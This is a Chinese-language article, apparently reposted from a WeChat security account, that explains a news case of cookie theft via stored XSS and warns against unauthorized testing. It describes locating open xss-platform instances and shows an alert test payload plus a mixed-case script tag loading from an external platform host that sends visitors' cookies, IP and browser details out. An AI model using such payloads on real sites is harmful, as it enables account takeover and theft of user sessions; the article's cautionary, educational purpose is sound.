今日看到一条微博,微博内容是这样的:
关于这个新闻,首先科普一下犯罪过程:
1、互联网搜索 XSS 找到跨站漏洞攻击平台
百度搜索 xss 关键词,翻了几页还真找到了一个在线平台:
赶紧打开看看能不能用,界面很不错:
注册发现,需要邀请码,但是这个平台是一个开源项目,已经有很多人在玩,那么通过关键词 xss-platform 来进行搜索,可以发现很多不需要验证码的平台,找一个注册账号进去看看:
2、通过该平台获取攻击代码,插入相关网站
有了攻击平台之后,找一下新闻中的攻击代码,因为是要获取 cookie 信息,所以找获取 cookie 的功能即可,创建一个测试 cookie 的项目,选择:
接下来查看攻击代码:
到这里就已经有了攻击代码。
3、将攻击代码插入到存在 XSS 漏洞的网站
从新闻中的结果来看,获取到六十多条 cookie 信息,还包含了管理员的,猜出是存储型的 XSS 漏洞,也就是插入的代码保存到数据库,只要有人访问那个被插入恶意代码的页面即可出发恶意代码,从而被盗取 cookie。
有人会问,盗取 cookie 有啥用?有了 cookie,就可以登录你的账户,接管你的账户,你登录之后能做的操作,攻击者都可以做,包括花你的钱,修改你的资料等等。
我们也来试试,首先得找到存在 XSS 漏洞的网站,对于白帽子而言,找到漏洞,第一时间应该提交到相关平台,督促官方修复漏洞,而测试漏洞是否存在,无需使用攻击平台,只要能弹窗就行,弹窗脚本:
<script>alert(1)</script>为了测试,我写了一个存在 xss 漏洞的测试页,内容如图:
将上面的弹窗代码带入参数,访问如图:
到这里,就已经可以证明漏洞存在了,作为白帽子的测试已经结束,提交漏洞即可,无需进一步测试。
但是新闻中的主人公,使用了攻击平台,插入了获取 cookie 的代码,我们试试插入攻击代码之后的效果:
<sCRiPt sRC=//xss.yt/Nz9U></sCrIpT>页面上没有任何反应,但是看看 xss 攻击平台有没有结果,看到一条新记录:
包含了我的 cookie、页面标题、远程 IP 地址、操作系统、浏览器等信息,而新闻中的主人公获取了六十多人的记录,相当于获得了六十多人的账号权限,这是不应该做的,也是违法的主要原因。
对于提供获取 Cookie 信息的平台也是具有连带责任的,属于为违法犯罪提供帮助,这也是不允许的。
4、总结
在互联网上做测试,一定不能越界,无论是出于何种目的,获取用户敏感数据,攻击在线平台都是不允许的,都存在未授权测试的违法行为,如果是白帽子,测试漏洞一定要点到为止,不能进行深入利用,如果作为红队成员,一定在授权的范围内进行测试,锻炼技术就打靶场吧,千万不要未授权实战利用漏洞,来提升自己的能力,越界后,将追悔莫及。
原文始发于微信公众号(信安之路):从 xss 反打到进小黑屋的故事
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论